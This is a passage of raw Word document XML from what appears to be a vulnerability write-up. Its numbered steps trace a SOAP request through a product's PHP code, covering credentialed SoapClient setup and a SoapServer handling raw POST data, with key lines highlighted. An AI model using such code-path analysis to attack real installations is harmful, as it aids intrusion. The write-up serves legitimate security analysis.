      <w:r>
        <w:t xml:space="preserve">” is set to “https://127.0.0.1”, thus the full </w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is: “https://127.0.0.1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SystemManagementService.php?wsdl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” (/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SystemManagementService.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>). Below is a partial snippet of the code described above:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5BD7" w14:paraId="55AAB700" w14:textId="77777777" w:rsidTr="002A5BD7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28C08E56" w14:textId="51AC1353" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>function _</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>invokeSMS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>( $</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>request )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E214AB0" w14:textId="0E4E4FF0" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3B2CC9" w14:textId="77777777" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E5F1340" w14:textId="567F8B38" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0072691A" w14:textId="77777777" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>protocol_host</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = $this-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_sms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-&gt;get('</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SMSHost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4036BEAC" w14:textId="77777777" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wsdl_host</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>protocol_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>host</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0F3D971E" w14:textId="77777777" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>is_https</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>strcasecmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">( </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>substr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>( $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>protocol_host</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, 0, 5 ), "https" ) == 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51E41D57" w14:textId="770489E3" w:rsidR="00FB064C" w:rsidRDefault="00FB064C" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5285A493" w14:textId="52E2625B" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wsdl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SystemManagementService.wsdl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6C078D4A" w14:textId="431A1C31" w:rsidR="002A5BD7" w:rsidRDefault="00FB064C" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DA8E433" w14:textId="77777777" w:rsidR="00FB064C" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    $client =&amp; new </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>SoapClient</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>( $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>wsdl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> , array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AF53AA4" w14:textId="794D7093" w:rsidR="002A5BD7" w:rsidRDefault="00FB064C" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidR="002A5BD7">
              <w:t xml:space="preserve">'exceptions' =&gt; </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="002A5BD7">
              <w:t>0,  /</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="002A5BD7">
              <w:t xml:space="preserve">/Turn off exception, we will handle errors </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CD7846F" w14:textId="4A879B25" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         'trace' =&gt; </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t xml:space="preserve">1, </w:t>
            </w:r>
            <w:r w:rsidR="00FB064C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">/Message trace for debugging </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="230094E1" w14:textId="0F1FBD7C" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         'login' =&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$this-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>m_sms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>-&gt;get('Login')</w:t>
            </w:r>
            <w:r>
              <w:t>, //Set HTTP Headers here for authentication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="685C4DA2" w14:textId="6D9697D4" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         'password' =&gt; $this-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_sms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-&gt;get('Password'),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="381B2E26" w14:textId="024BA6D1" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         'location' =&gt; $endpoint,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05C629AC" w14:textId="34145CC5" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         'timeout' =&gt; $this-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_sms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-&gt;get('</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SOAP_Timeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D76CC11" w14:textId="77777777" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     ));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F980C25" w14:textId="77777777" w:rsidR="00FB064C" w:rsidRDefault="00FB064C" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44187C51" w14:textId="77777777" w:rsidR="00FB064C" w:rsidRDefault="00FB064C" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB064C">
              <w:t>$result = $client-&gt;__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FB064C">
              <w:t>soapCall</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FB064C">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FB064C">
              <w:t>$request, array('parameters' =&gt; $parameters) , NULL, NULL, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FB064C">
              <w:t>output_headers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FB064C">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15721C0C" w14:textId="501150CB" w:rsidR="00FB064C" w:rsidRDefault="00FB064C" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59CADC06" w14:textId="6A6418A1" w:rsidR="00BB1762" w:rsidRDefault="00FB064C" w:rsidP="008E2160">
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">5) At this point, relevant code execution jumps to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SoapServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> processing which occurs in “/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SystemManagementService.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="00BB1762">
        <w:t xml:space="preserve">  “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BB1762">
        <w:t>SystemManagementService.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BB1762">
        <w:t xml:space="preserve">” instantiates a new PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BB1762">
        <w:t>SoapServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BB1762">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D501CA">
        <w:t>which uses the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D501CA">
        <w:t>SOAP_WebService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D501CA">
        <w:t xml:space="preserve">” class, </w:t>
      </w:r>
      <w:r w:rsidR="00BB1762">
        <w:t>and then</w:t>
      </w:r>
      <w:r w:rsidR="00D501CA">
        <w:t xml:space="preserve"> calls the “handle” method</w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve"> on that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003804C5">
        <w:t>SoapServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve"> class</w:t>
      </w:r>
      <w:r w:rsidR="00D501CA">
        <w:t xml:space="preserve"> with the SOAP request from </w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t>the previous step</w:t>
      </w:r>
      <w:r w:rsidR="00D501CA">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB1762" w14:paraId="06AD0F0A" w14:textId="77777777" w:rsidTr="00BB1762">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="420B1654" w14:textId="77777777" w:rsidR="00BB1762" w:rsidRDefault="00BB1762" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75019F97" w14:textId="77777777" w:rsidR="00D501CA" w:rsidRDefault="00BB1762" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$server = &amp;new </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>SoapServer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SystemManagementService.wsdl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>",</w:t>
            </w:r>
            <w:r w:rsidR="00D501CA">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B234FC" w14:textId="77777777" w:rsidR="00D501CA" w:rsidRDefault="00D501CA" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00BB1762">
              <w:t>array(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7CA8B154" w14:textId="0C0AB90D" w:rsidR="00BB1762" w:rsidRDefault="00D501CA" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidR="00BB1762">
              <w:t>'</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00BB1762">
              <w:t>classmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00BB1762">
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00BB1762">
              <w:t>array(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6EA7D302" w14:textId="32C4B55D" w:rsidR="00BB1762" w:rsidRDefault="00BB1762" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidR="00D501CA">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:t>'</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>submitRequestType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>submitRequestType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3756D85B" w14:textId="0E9E036E" w:rsidR="00BB1762" w:rsidRDefault="00BB1762" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>returnType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>returnType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">', </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19B6F2CD" w14:textId="10E63E47" w:rsidR="00BB1762" w:rsidRDefault="00BB1762" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            'Result' =&gt; 'Result',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B4CEE6B" w14:textId="00B2AAB0" w:rsidR="00BB1762" w:rsidRDefault="00BB1762" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>)));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43EB4C6E" w14:textId="3BEC1C6F" w:rsidR="00D501CA" w:rsidRDefault="00D501CA" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C0B8FE2" w14:textId="09BDBF5E" w:rsidR="00D501CA" w:rsidRDefault="00D501CA" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r w:rsidRPr="00D501CA">
              <w:t>$server-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D501CA">
              <w:t>setClass</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D501CA">
              <w:t>("</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D501CA">
              <w:t>SOAP_WebService</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D501CA">
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D501CA">
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1F62A335" w14:textId="77777777" w:rsidR="00BB1762" w:rsidRDefault="00BB1762" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A4834A1" w14:textId="77777777" w:rsidR="00BB1762" w:rsidRDefault="00BB1762" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>if (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>isset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>($_SERVER['REQUEST_METHOD']) &amp;&amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F17C959" w14:textId="77777777" w:rsidR="00BB1762" w:rsidRDefault="00BB1762" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    $_SERVER['REQUEST_METHOD</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>']=</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>='POST')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FFB1104" w14:textId="77777777" w:rsidR="00BB1762" w:rsidRDefault="00BB1762" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="016D14F2" w14:textId="4AFAAA7D" w:rsidR="00BB1762" w:rsidRDefault="00BB1762" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68109A2A" w14:textId="77777777" w:rsidR="00BB1762" w:rsidRDefault="00BB1762" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="003804C5">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$server-&gt;handle($HTTP_RAW_POST_DATA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003804C5">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="33B37570" w14:textId="78FC0707" w:rsidR="00BB1762" w:rsidRDefault="00BB1762" w:rsidP="00D501CA">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EE9F112" w14:textId="3ABFE430" w:rsidR="00A70677" w:rsidRDefault="00D501CA" w:rsidP="008E2160">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BB1762">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A251E">
        <w:t xml:space="preserve">6) The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A251E">
        <w:t>SoapServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve"> class</w:t>
      </w:r>
      <w:r w:rsidR="002A251E">
        <w:t xml:space="preserve"> then calls the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A251E">
        <w:t>submitRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A251E">
        <w:t>” method on the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A251E">
        <w:t>SOAP_WebService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A251E">
        <w:t>” class</w:t>
      </w:r>
      <w:r w:rsidR="00A145D6">
        <w:t xml:space="preserve"> which then in turn instantiates the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A145D6">
        <w:t>AARAnalysisModel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A145D6">
        <w:t>” class</w:t>
      </w:r>
      <w:r w:rsidR="00831184">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A145D6">
        <w:t>(/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A145D6">
        <w:t>mvap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A145D6">
        <w:t>/web/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A145D6">
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A145D6">
        <w:t>/include/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00831184">
        <w:t>AARAnalysisModel.class.php</w:t>
